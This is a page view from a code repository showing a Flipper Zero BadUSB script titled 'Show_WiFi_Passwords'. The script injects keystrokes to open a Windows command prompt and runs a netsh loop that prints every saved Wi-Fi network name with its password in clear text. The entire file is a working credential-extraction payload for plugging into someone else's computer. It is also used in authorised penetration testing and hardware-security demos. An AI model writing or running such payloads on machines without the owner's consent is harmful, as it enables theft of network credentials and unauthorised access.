Flipper/BadUSB/Show_WiFi_Passwords.txt

8 lines
223 B
Plaintext
Raw Normal View History

2022-05-18 12:58:12 +00:00
GUI r
DELAY 1000
STRING cmd
2022-05-18 12:58:12 +00:00
ENTER
DELAY 1000
STRING for /f "skip=9 tokens=1,2 delims=:" %i in ('netsh wlan show profiles') do @echo %j | netsh wlan show profiles %j key=clear | findstr /C:"SSID name" /C:"Key Content"
2022-05-18 12:58:12 +00:00
ENTER